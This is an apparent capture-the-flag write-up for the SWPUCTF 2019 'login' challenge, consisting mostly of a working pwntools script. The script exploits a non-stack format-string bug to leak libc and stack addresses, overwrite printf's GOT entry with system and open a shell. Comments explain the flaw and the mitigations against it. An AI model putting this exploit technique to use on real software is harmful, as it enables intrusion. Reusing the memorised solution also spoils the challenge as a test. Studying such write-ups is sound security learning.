BUU-SWPUCTF_2019_login-WP

Posted on Jan 27, 2021

本来想改返回地址的，但是发现不论是one_gadget还是system都出现了core dump，据说是32位程序这样改返回地址很容易爆，我也不知道为什么。最后还是覆写的printf@got

没有新知识，就是非栈上的格式化字符串。

exp

#!/usr/bin/env python
# coding=utf-8
# Write-up exploit for SWPUCTF 2019 "login" (32-bit, format-string bug).
#
# Root cause: the program hands the user-supplied "password" to printf as the
# format argument, so "%p" reads and "%hn" writes memory. Because the input
# buffer is not on the stack (see the write-up text), the script first edits
# pointers that already sit on the stack ("%6$hn") and then writes through
# them ("%10$hn").
#
# Defensive notes: a non-literal format string is flagged by -Wformat-security,
# glibc's _FORTIFY_SOURCE rejects %n-style directives in writable format
# strings, and Full RELRO would make the GOT entry overwritten below read-only.
#
# Python 2 script (note the `print payload` statement near the end).
from pwn import *
#context(log_level = 'debug')

#sh = process("./SWPUCTF_2019_login")
sh = remote("node3.buuoj.cn",28692)
# libc matching the remote service; used only to compute symbol offsets.
libc = ELF("./libcs/libc-2.27.so")

sh.sendlineafter("name: \n",'pwn')

# Step 1: leak a libc pointer. "%15$p" prints stack argument 15; the script
# assumes that slot holds the return address into __libc_start_main (+241)
# -- an offset established by the author with a debugger, not visible here.
payload = "%15$p"
sh.sendlineafter("password: \n",payload)
sh.recvuntil("password: ")
libc_base = int(sh.recvuntil("\n",drop = True),base = 16)
libc_base = libc_base - (libc.symbols["__libc_start_main"] + 241)
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.symbols["system"]
log.success("system_addr:" + hex(system_addr))
# Address of printf's GOT entry in the challenge binary (assumes no PIE, since
# the static value from the ELF is used directly).
printf_got = ELF("./SWPUCTF_2019_login").got["printf"]
log.success("printf@got:" + hex(printf_got))

# Step 2: leak a stack pointer from slot 6. The -0x10 rebases it so that
# stack_addr+4 .. stack_addr+10 fall on the slots written in Step 3; the exact
# layout relation between slots 6, 7, 8 and 10 comes from the author's
# debugging and cannot be confirmed from this script alone.
payload = "%6$p"
sh.sendlineafter("again!\n",payload)
sh.recvuntil("password: ")
stack_addr = int(sh.recvuntil("\n",drop = True),base = 16) - 0x10
log.success("stack_addr:" + hex(stack_addr))

# Step 3: build two 4-byte pointers (printf_got and printf_got+2) on the stack,
# two bytes at a time. Each pair of sends works the same way: "%6$hn" first
# stores a 16-bit value through the pointer in slot 6 (which appears to point
# at slot 10), retargeting slot 10 to the desired half-word; "%10$hn" then
# stores half of the GOT address through slot 10. "%<N>c" pads the output to
# N characters so that %hn writes N mod 2^16.
payload = "%" + str((stack_addr + 4) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

payload = "%" + str((stack_addr + 6) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)


payload = "%" + str((stack_addr + 8) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

payload = "%" + str((stack_addr + 10) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

# Step 4: overwrite printf@got with system in one format string. Slot 7 is
# expected to hold printf_got and slot 8 printf_got+2 (built above). The
# character count is cumulative across the whole format, so the second "%c"
# width is the difference between the two half-words; this only works while
# (system_addr >> 16) >= (system_addr & 0xffff), otherwise the count is
# negative and the format is malformed.
payload = "%" + str(system_addr & 0xffff) + 'c' + "%7$hn" 
payload += "%" + str((system_addr >> 16) - (system_addr & 0xffff)) + 'c' + "%8$hn"
print payload
sh.sendlineafter("again!\n",payload)

# printf now resolves to system, so the program's printf(buffer) call on the
# next input behaves as system(buffer).
sh.sendlineafter("again!\n","/bin/sh")

sh.interactive()